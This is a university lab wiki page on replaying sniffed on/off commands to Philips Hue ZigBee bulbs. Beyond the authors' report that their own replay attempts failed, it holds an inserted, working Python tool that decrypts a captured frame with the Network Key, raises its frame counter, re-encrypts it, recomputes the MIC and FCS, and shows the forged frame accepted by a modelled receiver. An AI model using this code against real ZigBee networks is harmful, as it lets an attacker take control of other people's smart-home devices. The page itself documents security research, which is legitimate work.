ZigBee Replay

From Embedded Lab Vienna for IoT & Security
Revision as of 08:31, 7 March 2019 by Lstrobl

Summary

After successfully sniffing the Network Key of a ZigBee network as described in ZigBee Sniffing, the next step is a replay attack: the captured on/off commands are sent again with adjusted frame counters. Simply retransmitting the captured frames is not enough, because a ZigBee device only accepts a frame whose counter is higher than the last one it accepted from that source, and the counter is also part of the CCM* nonce, so a frame with a new counter must be re-encrypted and its MIC and FCS recomputed under the Network Key.

Requirements

  • Operating system of attacking host: Kali Linux 64 Bit
    • Version 2018.2
  • Packages: KillerBee
  • Operating system of Raspberry Pi: RaspBee Gateway SD card image Raspbian Jessie RaspBee (Stable)
    • Version 01-2017

Authors

  • Daniel Tod
  • Luca Strobl

Results

  • zbreplay (KillerBee) does not work: the replayed frames keep their original frame counters, which the receiver checks and rejects
  • Python script to log the latest counters and build a packet with updated counters
    • The captured data is misinterpreted, so the recomputed FCS and MIC are wrong
    • No valid packet is constructed
  • Documentation of the conducted project and source code of the Python script

The authors suspect that the misinterpretation of the data results from the limited hardware capabilities of the Atmel RZ Raven USB stick. A Software Defined Radio (SDR) would be the remedy, but the Scapy radio drivers were only written for the Ettus USRP, and the authors were not provided with that SDR.
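The counter rewrite the Summary describes, and the stale-MIC/stale-FCS failure the Results report, in working form. This is an added example, not the authors' script: the header bytes, the APS payload and NETWORK_KEY are constructed dummy values rather than a capture, the frame layout (MAC header with short addresses and PAN ID compression, NWK header with security enabled, NWK auxiliary header with extended nonce, encrypted APS payload, 4-byte MIC, 2-byte FCS) is assumed, and AES-CCM* is taken from pycryptodome (ZigBee security level 5, ENC-MIC-32, is plain CCM with a 4-byte MIC). Without pycryptodome only the FCS part of the example runs.

```python
"""Re-send a captured ZigBee NWK frame with a fresh frame counter.

Constructed example: SAMPLE_HDR, SAMPLE_PLAINTEXT and NETWORK_KEY are made
up, not taken from a capture, and the frame layout below is assumed.
"""
import struct

try:  # AES-CCM* needs a crypto library; pycryptodome is assumed here
    from Crypto.Cipher import AES
except ImportError:  # without it only the FCS part of this example runs
    AES = None

MAC_HDR_LEN = 9      # FCF(2) seq(1) dst PAN(2) dst short(2) src short(2)
NWK_HDR_LEN = 8      # FCF(2) dst(2) src(2) radius(1) seq(1)
AUX_OFF = MAC_HDR_LEN + NWK_HDR_LEN
AUX_HDR_LEN = 14     # sec ctrl(1) frame counter(4) src ext addr(8) key seq(1)
PAYLOAD_OFF = AUX_OFF + AUX_HDR_LEN
SECURITY_LEVEL = 5   # ENC-MIC-32: CCM* here equals plain CCM with a 4-byte MIC
MIC_LEN = 4
NETWORK_KEY = bytes(range(16))  # dummy key, not a real Hue Network Key

def fcs_802154(data):
    """IEEE 802.15.4 FCS: CRC-16 ITU-T, bit-reflected (poly 0x8408), init 0."""
    crc = 0
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc

def frame_counter(frame):
    """NWK frame counter (little-endian) from the auxiliary header."""
    return struct.unpack_from("<I", frame, AUX_OFF + 1)[0]

def ccm_params(hdr):
    """Nonce and authenticated data for CCM*. The security level is sent as 0
    on the wire and restored in both the nonce and the authenticated header."""
    aux = bytearray(hdr[AUX_OFF:PAYLOAD_OFF])
    aux[0] |= SECURITY_LEVEL
    nonce = bytes(aux[5:13]) + bytes(aux[1:5]) + bytes([aux[0]])
    return nonce, bytes(hdr[MAC_HDR_LEN:AUX_OFF]) + bytes(aux)

def nwk_seal(hdr, plaintext, key=NETWORK_KEY):
    """Encrypt an APS payload under the Network Key: ciphertext || MIC."""
    nonce, aad = ccm_params(hdr)
    c = AES.new(key, AES.MODE_CCM, nonce=nonce, mac_len=MIC_LEN)
    c.update(aad)
    ct, mic = c.encrypt_and_digest(plaintext)
    return ct + mic

def nwk_open(hdr, sealed, key=NETWORK_KEY):
    """Verify the MIC and decrypt; raises ValueError if the MIC is wrong."""
    nonce, aad = ccm_params(hdr)
    c = AES.new(key, AES.MODE_CCM, nonce=nonce, mac_len=MIC_LEN)
    c.update(aad)
    return c.decrypt_and_verify(sealed[:-MIC_LEN], sealed[-MIC_LEN:])

def build_frame(hdr, plaintext):
    """Header + sealed payload + FCS (the FCS is appended little-endian)."""
    body = bytes(hdr) + nwk_seal(hdr, plaintext)
    return body + struct.pack("<H", fcs_802154(body))

def naive_counter_patch(frame, new_counter):
    """Only the counter bytes change: the MIC was computed over the old
    counter and the FCS over the old bytes, so both are now stale."""
    f = bytearray(frame)
    struct.pack_into("<I", f, AUX_OFF + 1, new_counter)
    return bytes(f)

def build_replay(frame, last_seen_counter):
    """Decrypt under the old nonce, bump the counter past the last one the
    target accepted, re-seal under the new nonce and recompute the FCS."""
    hdr = bytearray(frame[:PAYLOAD_OFF])
    plaintext = nwk_open(hdr, frame[PAYLOAD_OFF:-2])
    struct.pack_into("<I", hdr, AUX_OFF + 1, last_seen_counter + 1)
    return build_frame(hdr, plaintext)

def receiver_accepts(frame, last_seen_counter):
    """Model of the target: FCS check, MIC check, then the replay check that
    drops any frame whose counter is not above the last accepted one."""
    body, fcs = frame[:-2], struct.unpack("<H", frame[-2:])[0]
    if fcs_802154(body) != fcs:
        return False
    try:
        nwk_open(body[:PAYLOAD_OFF], body[PAYLOAD_OFF:])
    except ValueError:
        return False
    return frame_counter(frame) > last_seen_counter

# Constructed header: MAC FCF 0x8861, seq 0x2a, PAN 0x1234, dst 0x0001,
# src 0xab12; NWK FCF 0x0248 (data, v2, security on), dst, src, radius 30,
# seq 0x11; AUX: sec ctrl 0x28 (network key, extended nonce), counter 1000.
SAMPLE_HDR = (bytes.fromhex("6188 2a 3412 0100 12ab")
              + bytes.fromhex("4802 0100 12ab 1e 11")
              + b"\x28" + struct.pack("<I", 1000)
              + bytes.fromhex("0123456789abcdef") + b"\x00")
SAMPLE_PLAINTEXT = b"\x00\x06\x00\x01\x04\x01\x01\x01"  # stand-in, not a real APS On frame
SAMPLE_FRAME = build_frame(SAMPLE_HDR, SAMPLE_PLAINTEXT) if AES else None
```

With the sample frame, `receiver_accepts(SAMPLE_FRAME, 1000)` is False (the target already saw counter 1000), `naive_counter_patch(SAMPLE_FRAME, 1001)` is rejected at the FCS check before the MIC is even looked at, and `build_replay(SAMPLE_FRAME, 1000)` carries counter 1001 with a fresh MIC and FCS and is accepted. Against a real capture the offsets have to be taken from the decoded MAC and NWK headers rather than the constants above, and the "last seen" counter comes from the sniffer log, which is exactly what the authors' script set out to maintain.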

Used Hardware

  • Raspberry Pi 3 Model B+
  • SD card with at least 8 GB of storage
  • RaspBee module
  • Philips Hue light bulb
  • Atmel RZ Raven USB stick
  • Kali Linux host
  • USB mouse and keyboard
  • External monitor
  • HDMI cable

Courses